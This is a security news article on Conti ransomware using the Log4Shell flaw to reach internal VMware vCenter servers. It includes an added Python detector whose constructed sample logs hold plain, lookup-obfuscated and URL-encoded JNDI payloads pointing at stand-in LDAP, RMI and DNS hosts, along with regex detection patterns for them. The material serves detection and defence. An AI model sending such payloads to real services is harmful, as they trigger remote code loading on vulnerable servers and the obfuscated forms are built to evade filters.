Conti ransomware uses Log4j bug to hack VMware vCenter servers (Security News, December 2021)

The Conti ransomware operation is using the critical Log4Shell vulnerability (CVE-2021-44228 in Apache Log4j) to gain rapid access to internal VMware vCenter Server instances and encrypt the virtual machines they manage.
Among the first to leverage the bug were cryptocurrency miners, botnets, and a new ransomware strain called Khonsari.
While most defenders are focused on blocking Log4Shell attacks against Internet-exposed devices, the Conti operation shows how the vulnerability can also be used against internal systems that receive far less attention.
Researchers confirmed that Conti affiliates had already gained a foothold in the target networks and then exploited the Log4j flaw on vulnerable vCenter servers to move laterally to them, rather than using Log4Shell for the initial intrusion.
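Because Log4j resolves nested lookups before it ever reaches the `jndi:` prefix, attackers probing internal hosts routinely wrap the payload in `${lower:...}`, `${upper:...}` or the `${...:-x}` default syntax so that a naive grep for `${jndi:` misses it. The following detector, an added example that is not part of the original article and not code from Conti or any of the researchers cited, normalizes log lines the way Log4j would (URL-decoding and resolving the innermost lookups until nothing changes) and only then looks for a JNDI lookup with a scheme Log4j would dereference. The access-log lines are constructed for illustration and are not real traffic; the function and variable names are this example's own.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in log lines, including
the obfuscated forms used to evade a plain '${jndi:' signature.

Strategy: repeatedly URL-decode and resolve the innermost Log4j lookups that
attackers abuse for obfuscation (${lower:x}, ${upper:x}, and the ${name:-default}
fallback syntax, including ${::-x}) until the text stops changing. What remains
is what Log4j itself would see, so matching '${jndi:<scheme>:' on the
normalized text catches the evasions. Lookups this example does not model
(${date:...}, ${sys:...}, ...) are left in place, so a line that still holds a
nested '${${' after normalization deserves a manual look.
"""
import re
from urllib.parse import unquote

# Innermost lookup: ${...} whose body contains no further '${' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Case-changing lookups attackers use to hide individual letters.
_CASE = re.compile(r"(lower|upper):(.*)", re.DOTALL)
# A JNDI lookup with a scheme Log4j's JndiLookup will dereference.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
    re.IGNORECASE,
)


def _resolve_inner(match):
    """Resolve one innermost lookup the way Log4j's substitutor would."""
    body = match.group(1)
    name, sep, default = body.partition(":-")   # ${name:-default}
    m = _CASE.fullmatch(name)
    if m:                                       # ${lower:J} -> 'j', ${upper:j} -> 'J'
        return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()
    if sep:                                     # ${env:NaN:-j} or ${::-j} -> 'j'
        return default
    return match.group(0)                       # unknown lookup: leave it untouched


def normalize(text, max_rounds=20):
    """Undo URL-encoding and lookup-based obfuscation until a fixed point."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, unquote(text))
        if new == text:
            break
        text = new
    return text


def find_log4shell_probes(lines):
    """Return [(line_number, scheme)] for every line that, once normalized,
    contains a JNDI lookup Log4j would try to resolve."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed sample access-log lines (not real traffic): a benign request,
# a plain payload, two lookup-obfuscated payloads, a double-encoded payload
# in the query string, and a benign URL that merely contains the word 'jndi'.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Dec/2021:10:01:02 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2021:10:01:07 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "${jndi:ldap://10.0.0.9:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:09 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://10.0.0.9:1389/b}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:11 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://10.0.0.9:1099/c}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:13 +0000] "GET /ui/?q=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Adns%3A%2F%2Fx.example%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [14/Dec/2021:10:01:15 +0000] "GET /docs/jndi-howto.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme in find_log4shell_probes(SAMPLE_LOG):
        print(f"line {line_no}: JNDI lookup via {scheme}")
```

Run it against the logs of every Log4j-backed service reachable from inside the network, not just the edge: the point of the Conti activity above is that the probes arrive from hosts that are already compromised, so the source addresses are internal and an Internet-facing WAF never sees them.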
Conti is a Russian-speaking group that has been in the ransomware game for a long time and is regarded as the successor to the infamous Ryuk operation.
Recently, the Australian Cyber Security Centre published an alert about Conti ransomware targeting multiple organizations in the country.